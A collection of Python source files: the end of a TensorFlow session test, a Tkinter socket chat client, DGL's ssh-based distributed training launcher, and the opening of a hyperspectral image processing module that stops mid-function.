with session.Session(config=config_pb) as sess: for _ in range(num_epochs): sess.run(enqueue_op) self.assertEqual(sess.run(q.size()), num_epochs * 2) @test_util.run_v1_only('b/120545219') def testRegisterFetchAndFeedConversionFunctions(self): class SquaredTensor(object): def __init__(self, tensor): self.sq = math_ops.square(tensor) fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0]) feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)] feed_fn2 = lambda feed: [feed.sq] session.register_session_run_conversion_functions(SquaredTensor, fetch_fn, feed_fn1, feed_fn2) with self.assertRaises(ValueError): session.register_session_run_conversion_functions(SquaredTensor, fetch_fn, feed_fn1, feed_fn2) with self.cached_session() as sess: np1 = np.array([1.0, 1.5, 2.0, 2.5]) np2 = np.array([3.0, 3.5, 4.0, 4.5]) squared_tensor = SquaredTensor(np2) squared_eval = sess.run(squared_tensor) self.assertAllClose(np2 * np2, squared_eval) squared_eval = sess.run( squared_tensor, feed_dict={ squared_tensor: np1 * np1 }) self.assertAllClose(np1 * np1, squared_eval) partial_run = sess.partial_run_setup([squared_tensor], []) squared_eval = sess.partial_run(partial_run, squared_tensor) self.assertAllClose(np2 * np2, squared_eval) def testDefaultLogDevicePlacement(self): class CaptureStderr(str): """Class to capture stderr from C++ shared library.""" def __enter__(self): self._esc = compat.as_str('\b') self._output = compat.as_str('') self._stderr = sys.stderr self._fd = self._stderr.fileno() self._out_pipe, in_pipe = os.pipe() # Save the original io stream. self._dup_fd = os.dup(self._fd) # Replace the original io stream with in pipe. os.dup2(in_pipe, self._fd) return self def __exit__(self, *args): self._stderr.write(self._esc) self._stderr.flush() self.read() os.close(self._out_pipe) # Restore the original io stream. os.dup2(self._dup_fd, self._fd) def read(self): while True: data = os.read(self._out_pipe, 1) if not data or compat.as_str(data) == self._esc: break self._output += compat.as_str(data) def __str__(self): return self._output if context.executing_eagerly(): context.set_log_device_placement(True) with CaptureStderr() as log: a = constant_op.constant(1) b = constant_op.constant(2) c = a + b else: # Passing the config to the server, but not the session should still # result in logging device placement. config_pb = config_pb2.ConfigProto(log_device_placement=True) server = server_lib.Server.create_local_server(config=config_pb) a = constant_op.constant(1) b = constant_op.constant(2) c = a + b with session.Session(server.target) as sess: with CaptureStderr() as log: sess.run(c) # Ensure that we did log device placement. device_type = test_util.gpu_device_type() or "CPU" device_name = '/replica:0/task:0/device:%s:0' % device_type self.assertTrue(device_name in str(log), str(log)) @test_util.run_v1_only('b/120545219') def testLocalMasterSessionTimeout(self): # Test that the timeout passed in a config to the session works correctly. config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000) server = server_lib.Server.create_local_server() q = data_flow_ops.FIFOQueue(1, dtypes.float32) dequeued_t = q.dequeue() with session.Session(server.target, config=config_pb) as sess: # Intentionally do not run any enqueue_ops so that dequeue will block # until operation_timeout_in_ms. with self.assertRaises(errors.DeadlineExceededError): sess.run(dequeued_t) @test_util.run_v1_only('b/120545219') def testDefaultServerTimeout(self): # Test that the default server config timeout gets used when no Session # config is provided. config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000) server = server_lib.Server.create_local_server(config=config_pb) q = data_flow_ops.FIFOQueue(1, dtypes.float32) dequeued_t = q.dequeue() with session.Session(server.target) as sess: # Intentionally do not run any enqueue_ops so that dequeue will block # until operation_timeout_in_ms. with self.assertRaises(errors.DeadlineExceededError): sess.run(dequeued_t) def runTestBuildGraphError(self, sess): # Ensure that errors from building the graph get propagated. data = array_ops.placeholder(dtypes.float32, shape=[]) # pylint: disable=protected-access enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False) enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False) # pylint: enable=protected-access res = math_ops.add(enter_1, enter_2) with self.assertRaisesOpError('has inputs from different frames'): sess.run(res, feed_dict={data: 1.0}) @test_util.run_v1_only('b/120545219') def testBuildGraphErrorDirect(self): self.runTestBuildGraphError(session.Session()) @test_util.run_v1_only('b/120545219') def testBuildGraphErrorDist(self): server = server_lib.Server.create_local_server() self.runTestBuildGraphError(session.Session(server.target)) def testDeviceAttributes(self): attrs = session._DeviceAttributes( '/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000) self.assertEqual(1337, attrs.memory_limit_bytes) self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name) self.assertEqual('TYPE', attrs.device_type) self.assertEqual(1000000, attrs.incarnation) str_repr = '%s' % attrs self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr) def testDeviceAttributesCanonicalization(self): attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1', 'TYPE', 1337, 1000000) self.assertEqual(1337, attrs.memory_limit_bytes) self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name) self.assertEqual('TYPE', attrs.device_type) self.assertEqual(1000000, attrs.incarnation) str_repr = '%s' % attrs self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr) def runTestAddFunctionToSession(self, target=''): """Add a function to a session after the graph has already been run.""" @function.Defun(dtypes.float32) def foo(x): return x + 1 x = constant_op.constant(1.0) with session.Session(target=target) as sess: sess.run(x) f = foo(x) result = sess.run(f) self.assertEqual(result, 2.0) @test_util.run_v1_only('b/120545219') def testAddFunctionToSession(self): self.runTestAddFunctionToSession() @test_util.run_v1_only('b/120545219') def testAddFunctionToGrpcSession(self): server = server_lib.Server.create_local_server() self.runTestAddFunctionToSession(server.target) def testOpenAndCloseGrpcSession(self): server = server_lib.Server.create_local_server() with session.Session(server.target): pass def testOpenAndCloseSession(self): with session.Session(): pass @test_util.run_v1_only('b/120545219') def testAutoConvertAndCheckData(self): with self.cached_session() as sess: a = array_ops.placeholder(dtype=dtypes.string) with self.assertRaisesRegexp( TypeError, r'Type of feed value 1 with type <(\w+) \'int\'> is not'): sess.run(a, feed_dict={a: 1}) @test_util.run_v1_only('b/120545219') def testOptimizerOptions(self): config.set_optimizer_experimental_options({'min_graph_nodes': -1}) with ops.Graph().as_default(): sess = session.Session() self.assertEqual( sess._config.graph_options.rewrite_options.min_graph_nodes, -1) if __name__ == '__main__': googletest.main()
chat_client_gui.py
#!/usr/bin/env python3 """Script for Tkinter GUI chat client.""" import os from socket import AF_INET, socket, SOCK_STREAM from threading import Thread import tkinter def receive(): """Handles receiving of messages.""" while True: try: msg = client_socket.recv(BUFSIZ).decode("utf8") msg_list.insert(tkinter.END, msg) except OSError: # Possibly client has left the chat. break def send(event=None): # event is passed by binders. """Handles sending of messages.""" msg = my_msg.get() my_msg.set("") # Clears input field. client_socket.send(bytes(msg, "utf8")) if msg == "{quit}": client_socket.close() top.quit() def on_closing(event=None): """This function is to be called when the window is closed.""" my_msg.set("{quit}") send() top = tkinter.Tk() top.title("Chatter") messages_frame = tkinter.Frame(top) my_msg = tkinter.StringVar() # For the messages to be sent. my_msg.set("Type your messages here.") scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages. # Following will contain the messages. msg_list = tkinter.Listbox( messages_frame, height=15, width=50, yscrollcommand=scrollbar.set ) scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y) msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH) msg_list.pack() messages_frame.pack() entry_field = tkinter.Entry(top, textvariable=my_msg) entry_field.bind("<Return>", send) entry_field.pack() send_button = tkinter.Button(top, text="Send", command=send) send_button.pack() top.protocol("WM_DELETE_WINDOW", on_closing) CHAT_SERVER_HOST = os.getenv("CHAT_SERVER_HOST", "bueno.network") CHAT_SERVER_PORT = os.getenv("CHAT_SERVER_PORT", 1119) print( "Connecting to chat server at {HOST}:{PORT}".format( HOST=CHAT_SERVER_HOST, PORT=CHAT_SERVER_PORT ) ) BUFSIZ = 1024 ADDR = (CHAT_SERVER_HOST, int(CHAT_SERVER_PORT)) client_socket = socket(AF_INET, SOCK_STREAM) client_socket.connect(ADDR) receive_thread = Thread(target=receive) receive_thread.start() tkinter.mainloop() # Starts GUI execution.
launch.py
"""Launching tool for DGL distributed training""" import os import stat import sys import subprocess import argparse import signal import logging import time import json import multiprocessing import re from functools import partial from threading import Thread from typing import Optional DEFAULT_PORT = 30050 def cleanup_proc(get_all_remote_pids, conn): '''This process tries to clean up the remote training tasks. ''' print('cleanupu process runs') # This process should not handle SIGINT. signal.signal(signal.SIGINT, signal.SIG_IGN) data = conn.recv() # If the launch process exits normally, this process doesn't need to do anything. if data == 'exit': sys.exit(0) else: remote_pids = get_all_remote_pids() # Otherwise, we need to ssh to each machine and kill the training jobs. for (ip, port), pids in remote_pids.items(): kill_process(ip, port, pids) print('cleanup process exits') def kill_process(ip, port, pids): '''ssh to a remote machine and kill the specified processes. ''' curr_pid = os.getpid() killed_pids = [] # If we kill child processes first, the parent process may create more again. This happens # to Python's process pool. After sorting, we always kill parent processes first. pids.sort() for pid in pids: assert curr_pid != pid print('kill process {} on {}:{}'.format(pid, ip, port), flush=True) kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill {}\''.format(pid) subprocess.run(kill_cmd, shell=True) killed_pids.append(pid) # It's possible that some of the processes are not killed. Let's try again. for i in range(3): killed_pids = get_killed_pids(ip, port, killed_pids) if len(killed_pids) == 0: break else: killed_pids.sort() for pid in killed_pids: print('kill process {} on {}:{}'.format(pid, ip, port), flush=True) kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill -9 {}\''.format(pid) subprocess.run(kill_cmd, shell=True) def get_killed_pids(ip, port, killed_pids): '''Get the process IDs that we want to kill but are still alive. ''' killed_pids = [str(pid) for pid in killed_pids] killed_pids = ','.join(killed_pids) ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -p {} -h\''.format(killed_pids) res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE) pids = [] for p in res.stdout.decode('utf-8').split('\n'): l = p.split() if len(l) > 0: pids.append(int(l[0])) return pids def execute_remote( cmd: str, ip: str, port: int, username: Optional[str] = "" ) -> Thread: """Execute command line on remote machine via ssh. Args: cmd: User-defined command (udf) to execute on the remote host. ip: The ip-address of the host to run the command on. port: Port number that the host is listening on. thread_list: username: Optional. If given, this will specify a username to use when issuing commands over SSH. Useful when your infra requires you to explicitly specify a username to avoid permission issues. Returns: thread: The Thread whose run() is to run the `cmd` on the remote host. Returns when the cmd completes on the remote host. """ ip_prefix = "" if username: ip_prefix += "{username}@".format(username=username) # Construct ssh command that executes `cmd` on the remote host ssh_cmd = "ssh -o StrictHostKeyChecking=no -p {port} {ip_prefix}{ip} '{cmd}'".format( port=str(port), ip_prefix=ip_prefix, ip=ip, cmd=cmd, ) # thread func to run the job def run(ssh_cmd): subprocess.check_call(ssh_cmd, shell=True) thread = Thread(target=run, args=(ssh_cmd,)) thread.setDaemon(True) thread.start() return thread def get_remote_pids(ip, port, cmd_regex): """Get the process IDs that run the command in the remote machine. """ pids = [] curr_pid = os.getpid() # Here we want to get the python processes. We may get some ssh processes, so we should filter them out. ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -aux | grep python | grep -v StrictHostKeyChecking\'' res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE) for p in res.stdout.decode('utf-8').split('\n'): l = p.split() if len(l) < 2: continue # We only get the processes that run the specified command. res = re.search(cmd_regex, p) if res is not None and int(l[1]) != curr_pid: pids.append(l[1]) pid_str = ','.join([str(pid) for pid in pids]) ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'pgrep -P {}\''.format(pid_str) res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE) pids1 = res.stdout.decode('utf-8').split('\n') all_pids = [] for pid in set(pids + pids1): if pid == '' or int(pid) == curr_pid: continue all_pids.append(int(pid)) all_pids.sort() return all_pids def get_all_remote_pids(hosts, ssh_port, udf_command): '''Get all remote processes. ''' remote_pids = {} for node_id, host in enumerate(hosts): ip, _ = host # When creating training processes in remote machines, we may insert some arguments # in the commands. We need to use regular expressions to match the modified command. cmds = udf_command.split() new_udf_command = ' .*'.join(cmds) pids = get_remote_pids(ip, ssh_port, new_udf_command) remote_pids[(ip, ssh_port)] = pids return remote_pids def construct_torch_dist_launcher_cmd( num_trainers: int, num_nodes: int, node_rank: int, master_addr: str, master_port: int ) -> str: """Constructs the torch distributed launcher command. Helper function. Args: num_trainers: num_nodes: node_rank: master_addr: master_port: Returns: cmd_str. """ torch_cmd_template = "-m torch.distributed.launch " \ "--nproc_per_node={nproc_per_node} " \ "--nnodes={nnodes} " \ "--node_rank={node_rank} " \ "--master_addr={master_addr} " \ "--master_port={master_port}" return torch_cmd_template.format( nproc_per_node=num_trainers, nnodes=num_nodes, node_rank=node_rank, master_addr=master_addr, master_port=master_port ) def wrap_udf_in_torch_dist_launcher( udf_command: str, num_trainers: int, num_nodes: int, node_rank: int, master_addr: str, master_port: int, ) -> str: """Wraps the user-defined function (udf_command) with the torch.distributed.launch module. Example: if udf_command is "python3 run/some/trainer.py arg1 arg2", then new_df_command becomes: "python3 -m torch.distributed.launch <TORCH DIST ARGS> run/some/trainer.py arg1 arg2 udf_command is assumed to consist of pre-commands (optional) followed by the python launcher script (required): Examples: # simple python3.7 path/to/some/trainer.py arg1 arg2 # multi-commands (cd some/dir && python3.7 path/to/some/trainer.py arg1 arg2) IMPORTANT: If udf_command consists of multiple python commands, then this will result in undefined behavior. Args: udf_command: num_trainers: num_nodes: node_rank: master_addr: master_port: Returns: """ torch_dist_cmd = construct_torch_dist_launcher_cmd( num_trainers=num_trainers, num_nodes=num_nodes, node_rank=node_rank, master_addr=master_addr, master_port=master_port ) # Auto-detect the python binary that kicks off the distributed trainer code. # Note: This allowlist order matters, this will match with the FIRST matching entry. Thus, please add names to this # from most-specific to least-specific order eg: # (python3.7, python3.8) -> (python3) # The allowed python versions are from this: https://www.dgl.ai/pages/start.html python_bin_allowlist = ( "python3.6", "python3.7", "python3.8", "python3.9", "python3", # for backwards compatibility, accept python2 but technically DGL is a py3 library, so this is not recommended "python2.7", "python2", ) # If none of the candidate python bins match, then we go with the default `python` python_bin = "python" for candidate_python_bin in python_bin_allowlist: if candidate_python_bin in udf_command: python_bin = candidate_python_bin break # transforms the udf_command from: # python path/to/dist_trainer.py arg0 arg1 # to: # python -m torch.distributed.launch [DIST TORCH ARGS] path/to/dist_trainer.py arg0 arg1 # Note: if there are multiple python commands in `udf_command`, this may do the Wrong Thing, eg launch each # python command within the torch distributed launcher. new_udf_command = udf_command.replace(python_bin, f"{python_bin} {torch_dist_cmd}") return new_udf_command def construct_dgl_server_env_vars( num_samplers: int, num_server_threads: int, tot_num_clients: int, part_config: str, ip_config: str, num_servers: int, graph_format: str, pythonpath: Optional[str] = "", ) -> str: """Constructs the DGL server-specific env vars string that are required for DGL code to behave in the correct server role. Convenience function. Args: num_samplers: num_server_threads: tot_num_clients: part_config: Partition config. Relative path to workspace. ip_config: IP config file containing IP addresses of cluster hosts. Relative path to workspace. num_servers: graph_format: pythonpath: Optional. If given, this will pass this as PYTHONPATH. Returns: server_env_vars: The server-specific env-vars in a string format, friendly for CLI execution. """ server_env_vars_template = ( "DGL_ROLE={DGL_ROLE} " "DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} " "OMP_NUM_THREADS={OMP_NUM_THREADS} " "DGL_NUM_CLIENT={DGL_NUM_CLIENT} " "DGL_CONF_PATH={DGL_CONF_PATH} " "DGL_IP_CONFIG={DGL_IP_CONFIG} " "DGL_NUM_SERVER={DGL_NUM_SERVER} " "DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} " "{suffix_optional_envvars}" ) suffix_optional_envvars = "" if pythonpath: suffix_optional_envvars += f"PYTHONPATH={pythonpath} " return server_env_vars_template.format( DGL_ROLE="server", DGL_NUM_SAMPLER=num_samplers, OMP_NUM_THREADS=num_server_threads, DGL_NUM_CLIENT=tot_num_clients, DGL_CONF_PATH=part_config, DGL_IP_CONFIG=ip_config, DGL_NUM_SERVER=num_servers, DGL_GRAPH_FORMAT=graph_format, suffix_optional_envvars=suffix_optional_envvars, ) def construct_dgl_client_env_vars( num_samplers: int, tot_num_clients: int, part_config: str, ip_config: str, num_servers: int, graph_format: str, num_omp_threads: int, pythonpath: Optional[str] = "", ) -> str: """Constructs the DGL client-specific env vars string that are required for DGL code to behave in the correct client role. Convenience function. Args: num_samplers: tot_num_clients: part_config: Partition config. Relative path to workspace. ip_config: IP config file containing IP addresses of cluster hosts. Relative path to workspace. num_servers: graph_format: num_omp_threads: pythonpath: Optional. If given, this will pass this as PYTHONPATH. Returns: client_env_vars: The client-specific env-vars in a string format, friendly for CLI execution. """ client_env_vars_template = ( "DGL_DIST_MODE={DGL_DIST_MODE} " "DGL_ROLE={DGL_ROLE} " "DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} " "DGL_NUM_CLIENT={DGL_NUM_CLIENT} " "DGL_CONF_PATH={DGL_CONF_PATH} " "DGL_IP_CONFIG={DGL_IP_CONFIG} " "DGL_NUM_SERVER={DGL_NUM_SERVER} " "DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} " "OMP_NUM_THREADS={OMP_NUM_THREADS} " "{suffix_optional_envvars}" ) # append optional additional env-vars suffix_optional_envvars = "" if pythonpath: suffix_optional_envvars += f"PYTHONPATH={pythonpath} " return client_env_vars_template.format( DGL_DIST_MODE="distributed", DGL_ROLE="client", DGL_NUM_SAMPLER=num_samplers, DGL_NUM_CLIENT=tot_num_clients, DGL_CONF_PATH=part_config, DGL_IP_CONFIG=ip_config, DGL_NUM_SERVER=num_servers, DGL_GRAPH_FORMAT=graph_format, OMP_NUM_THREADS=num_omp_threads, suffix_optional_envvars=suffix_optional_envvars, ) def wrap_cmd_with_local_envvars(cmd: str, env_vars: str) -> str: """Wraps a CLI command with desired env vars with the following properties: (1) env vars persist for the entire `cmd`, even if it consists of multiple "chained" commands like: cmd = "ls && pwd && python run/something.py" (2) env vars don't pollute the environment after `cmd` completes. Example: >>> cmd = "ls && pwd" >>> env_vars = "VAR1=value1 VAR2=value2" >>> wrap_cmd_with_local_envvars(cmd, env_vars) "(export VAR1=value1 VAR2=value2; ls && pwd)" Args: cmd: env_vars: A string containing env vars, eg "VAR1=val1 VAR2=val2" Returns: cmd_with_env_vars: """ # use `export` to persist env vars for entire cmd block. required if udf_command is a chain of commands # also: wrap in parens to not pollute env: # https://stackoverflow.com/a/45993803 return f"(export {env_vars}; {cmd})" def wrap_cmd_with_extra_envvars(cmd: str, env_vars: list) -> str: """Wraps a CLI command with extra env vars Example: >>> cmd = "ls && pwd" >>> env_vars = ["VAR1=value1", "VAR2=value2"] >>> wrap_cmd_with_extra_envvars(cmd, env_vars) "(export VAR1=value1 VAR2=value2; ls && pwd)" Args: cmd: env_vars: A list of strings containing env vars, e.g., ["VAR1=value1", "VAR2=value2"] Returns: cmd_with_env_vars: """ env_vars = " ".join(env_vars) return wrap_cmd_with_local_envvars(cmd, env_vars) def submit_jobs(args, udf_command): """Submit distributed jobs (server and client processes) via ssh""" hosts = [] thread_list = [] server_count_per_machine = 0 # Get the IP addresses of the cluster. ip_config = os.path.join(args.workspace, args.ip_config) with open(ip_config) as f: for line in f: result = line.strip().split() if len(result) == 2: ip = result[0] port = int(result[1]) hosts.append((ip, port)) elif len(result) == 1: ip = result[0] port = DEFAULT_PORT hosts.append((ip, port)) else: raise RuntimeError("Format error of ip_config.") server_count_per_machine = args.num_servers # Get partition info of the graph data part_config = os.path.join(args.workspace, args.part_config) with open(part_config) as conf_f: part_metadata = json.load(conf_f) assert 'num_parts' in part_metadata, 'num_parts does not exist.' # The number of partitions must match the number of machines in the cluster. assert part_metadata['num_parts'] == len(hosts), \ 'The number of graph partitions has to match the number of machines in the cluster.' tot_num_clients = args.num_trainers * (1 + args.num_samplers) * len(hosts) # launch server tasks server_env_vars = construct_dgl_server_env_vars( num_samplers=args.num_samplers, num_server_threads=args.num_server_threads, tot_num_clients=tot_num_clients, part_config=args.part_config, ip_config=args.ip_config, num_servers=args.num_servers, graph_format=args.graph_format, pythonpath=os.environ.get("PYTHONPATH", ""), ) for i in range(len(hosts) * server_count_per_machine): ip, _ = hosts[int(i / server_count_per_machine)] server_env_vars_cur = f"{server_env_vars} DGL_SERVER_ID={i}" cmd = wrap_cmd_with_local_envvars(udf_command, server_env_vars_cur) cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd cmd = 'cd ' + str(args.workspace) + '; ' + cmd thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username)) # launch client tasks client_env_vars = construct_dgl_client_env_vars( num_samplers=args.num_samplers, tot_num_clients=tot_num_clients, part_config=args.part_config, ip_config=args.ip_config, num_servers=args.num_servers, graph_format=args.graph_format, num_omp_threads=os.environ.get("OMP_NUM_THREADS", str(args.num_omp_threads)), pythonpath=os.environ.get("PYTHONPATH", ""), ) for node_id, host in enumerate(hosts): ip, _ = host # Transform udf_command to follow torch's dist launcher format: `PYTHON_BIN -m torch.distributed.launch ... UDF` torch_dist_udf_command = wrap_udf_in_torch_dist_launcher( udf_command=udf_command, num_trainers=args.num_trainers, num_nodes=len(hosts), node_rank=node_id, master_addr=hosts[0][0], master_port=1234, ) cmd = wrap_cmd_with_local_envvars(torch_dist_udf_command, client_env_vars) cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd cmd = 'cd ' + str(args.workspace) + '; ' + cmd thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username)) # Start a cleanup process dedicated for cleaning up remote training jobs. conn1,conn2 = multiprocessing.Pipe() func = partial(get_all_remote_pids, hosts, args.ssh_port, udf_command) process = multiprocessing.Process(target=cleanup_proc, args=(func, conn1)) process.start() def signal_handler(signal, frame): logging.info('Stop launcher') # We need to tell the cleanup process to kill remote training jobs. conn2.send('cleanup') sys.exit(0) signal.signal(signal.SIGINT, signal_handler) for thread in thread_list: thread.join() # The training processes complete. We should tell the cleanup process to exit. conn2.send('exit') process.join() def main(): parser = argparse.ArgumentParser(description='Launch a distributed job') parser.add_argument('--ssh_port', type=int, default=22, help='SSH Port.') parser.add_argument( "--ssh_username", default="", help="Optional. When issuing commands (via ssh) to cluster, use the provided username in the ssh cmd. " "Example: If you provide --ssh_username=bob, then the ssh command will be like: 'ssh bob@1.2.3.4 CMD' " "instead of 'ssh 1.2.3.4 CMD'" ) parser.add_argument('--workspace', type=str, help='Path of user directory of distributed tasks. \ This is used to specify a destination location where \ the contents of current directory will be rsyncd') parser.add_argument('--num_trainers', type=int, help='The number of trainer processes per machine') parser.add_argument('--num_omp_threads', type=int, help='The number of OMP threads per trainer') parser.add_argument('--num_samplers', type=int, default=0, help='The number of sampler processes per trainer process') parser.add_argument('--num_servers', type=int, help='The number of server processes per machine') parser.add_argument('--part_config', type=str, help='The file (in workspace) of the partition config') parser.add_argument('--ip_config', type=str, help='The file (in workspace) of IP configuration for server processes') parser.add_argument('--num_server_threads', type=int, default=1, help='The number of OMP threads in the server process. \ It should be small if server processes and trainer processes run on \ the same machine. By default, it is 1.') parser.add_argument('--graph_format', type=str, default='csc', help='The format of the graph structure of each partition. \ The allowed formats are csr, csc and coo. A user can specify multiple \ formats, separated by ",". For example, the graph format is "csr,csc".') parser.add_argument('--extra_envs', nargs='+', type=str, default=[], help='Extra environment parameters need to be set. For example, \ you can set the LD_LIBRARY_PATH and NCCL_DEBUG by adding: \ --extra_envs LD_LIBRARY_PATH=/usr/local/cuda/lib64:$LD_LIBRARY_PATH NCCL_DEBUG=INFO ') args, udf_command = parser.parse_known_args() assert len(udf_command) == 1, 'Please provide user command line.' assert args.num_trainers is not None and args.num_trainers > 0, \ '--num_trainers must be a positive number.' assert args.num_samplers is not None and args.num_samplers >= 0, \ '--num_samplers must be a non-negative number.' assert args.num_servers is not None and args.num_servers > 0, \ '--num_servers must be a positive number.' assert args.num_server_threads > 0, '--num_server_threads must be a positive number.' assert args.workspace is not None, 'A user has to specify a workspace with --workspace.' assert args.part_config is not None, \ 'A user has to specify a partition configuration file with --part_config.' assert args.ip_config is not None, \ 'A user has to specify an IP configuration file with --ip_config.' if args.num_omp_threads is None: # Here we assume all machines have the same number of CPU cores as the machine # where the launch script runs. args.num_omp_threads = max(multiprocessing.cpu_count() // 2 // args.num_trainers, 1) print('The number of OMP threads per trainer is set to', args.num_omp_threads) udf_command = str(udf_command[0]) if 'python' not in udf_command: raise RuntimeError("DGL launching script can only support Python executable file.") submit_jobs(args, udf_command) if __name__ == '__main__': fmt = '%(asctime)s %(levelname)s %(message)s' logging.basicConfig(format=fmt, level=logging.INFO) main()
sip_functions.py
# -*- coding: utf-8 -*- """ Created on Fri Mar 27 11:35:45 2020 @author: nigo0024 """ from ast import literal_eval from copy import deepcopy import fnmatch import itertools as it import math import numpy as np import os import geopandas as gpd import pandas as pd import pathlib import sys import time from hs_process import batch from sklearn.model_selection import RepeatedStratifiedKFold from sklearn.model_selection import train_test_split from sklearn.linear_model import Lasso from sklearn.svm import SVR from sklearn.ensemble import RandomForestRegressor from sklearn.cross_decomposition import PLSRegression from sklearn.feature_selection import SelectFromModel from sklearn.model_selection import GridSearchCV from sklearn.model_selection import StratifiedKFold from sklearn.impute import KNNImputer from sklearn.experimental import enable_iterative_imputer from sklearn.impute import IterativeImputer from sklearn.preprocessing import PowerTransformer from sklearn.compose import TransformedTargetRegressor from sklearn.metrics import mean_absolute_error from sklearn.metrics import mean_squared_error from sklearn.metrics import mean_squared_log_error from sklearn.metrics import r2_score from scipy.stats import rankdata import warnings from sklearn.utils._testing import ignore_warnings from sklearn.exceptions import ConvergenceWarning # Plotting from sklearn.linear_model import LinearRegression from matplotlib import pyplot as plt import seaborn as sns import matplotlib.lines as mlines import matplotlib.patches as mpatches from matplotlib.ticker import MaxNLocator import matplotlib.ticker from matplotlib.ticker import FormatStrFormatter from datetime import datetime import subprocess import globus_sdk from extended_text_box import BoxStyle from extended_text_box import ExtendedTextBox from concurrent.futures import ProcessPoolExecutor from multiprocessing import Manager # In[File management functions] def hs_grid_search(hs_settings, msi_run_id, dir_out=None): ''' Reads ``hs_settings`` and returns a dataframe with all the necessary information to execute each specific processing scenario. This enables searching over any number of image processsing scenarios. Folder name will be the index of df_grid for each set of outputs, so df_grid must be referenced to know which folder corresponds to which scenario. ''' df_grid = pd.DataFrame(columns=hs_settings.keys()) keys = hs_settings.keys() values = (hs_settings[key] for key in keys) combinations = [dict(zip(keys, combination)) for combination in it.product(*values)] for i in combinations: data = [] for col in df_grid.columns: data.append(i[col]) df_temp = pd.DataFrame(data=[data], columns=df_grid.columns) df_grid = df_grid.append(df_temp) df_grid = df_grid.reset_index(drop=True) # if csv is True: if dir_out is not None and os.path.isdir(dir_out): df_grid.to_csv(os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_hs_settings.csv'), index=True) return df_grid def get_idx_grid(dir_results_msi, msi_run_id, idx_min=0): ''' Finds the index of the processing scenario based on files written to disk The problem I have, is that after 10 loops, I am running into a memoryerror. I am not sure why this is, but one thing I can try is to restart the Python instance and begin the script from the beginning after every main loop. However, I must determine which processing scenario I am currently on based on the files written to disk. Parameters: dir_results_msi: directory to search msi_run_id: start: The minimum idx_grid to return (e.g., if start=100, then idx_grid will be forced to be at least 100; it will be higher if other folders already exist and processing as been performed) ''' # onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))] folders_all = [f for f in os.listdir(dir_results_msi) if os.path.isdir(os.path.join(dir_results_msi, f))] folders_out = [] idx_list = [] str_match = 'msi_' + str(msi_run_id) + '_' # eligible folders must have this in their name for f in folders_all: if str_match in f: idx_grid1 = int(f.replace(str_match, '')) if idx_grid1 >= idx_min: idx_list.append(idx_grid1) folders_out.append(f) if len(idx_list) == 0: return idx_min for idx_grid2 in range(idx_min, max(idx_list)+2): if idx_grid2 not in idx_list: break # idx_dir = os.path.join(dir_results_msi, str_match + str(idx_grid2)) # if not os.path.isdir(idx_dir): # os.mkdir(idx_dir) return idx_grid2 def grid_n_levels(df_grid): n_clip = len(df_grid['clip'].unique()) n_smooth = len(df_grid['smooth'].unique()) n_bin = len(df_grid['bin'].unique()) n_segment = len(df_grid['segment'].unique()) return n_clip, n_smooth, n_bin, n_segment def clean_df_grid(df_grid): # [(x, y) for x in [1,2,3] for y in [3,1,4] if x != y] # for proc_step, in ['clip', 'smooth', 'bin', 'segment', 'feature'] and i in range(10): # print(proc_step, i) scenarios = [(idx, row_n, proc_step) for idx, row_n in df_grid.iterrows() for proc_step in ['clip', 'smooth', 'bin', 'segment']] for idx, row_n, proc_step in scenarios: try: df_grid.loc[idx][proc_step] = literal_eval(row_n[proc_step]) except ValueError: pass return df_grid # try: # df_grid.loc[idx]['smooth'] = literal_eval(row_n['smooth']) # except ValueError: # pass # try: # df_grid.loc[idx]['bin'] = literal_eval(row_n['smooth']) # except ValueError: # pass # try: # df_grid.loc[idx]['segment'] = literal_eval(row_n['segment']) # except ValueError: # pass def recurs_dir(base_dir, search_ext='.bip', level=None): ''' Searches all folders and subfolders recursively within <base_dir> for filetypes of <search_exp>. Returns sorted <outFiles>, a list of full path strings of each result. Parameters: base_dir: directory path that should include files to be returned search_ext: file format/extension to search for in all directories and subdirectories level: how many levels to search; if None, searches all levels Returns: out_files: include the full pathname, filename, and ext of all files that have ``search_exp`` in their name. ''' if level is None: level = 1 else: level -= 1 d_str = os.listdir(base_dir) out_files = [] for item in d_str: full_path = os.path.join(base_dir, item) if not os.path.isdir(full_path) and item.endswith(search_ext): out_files.append(full_path) elif os.path.isdir(full_path) and level >= 0: new_dir = full_path # If dir, then search in that out_files_temp = 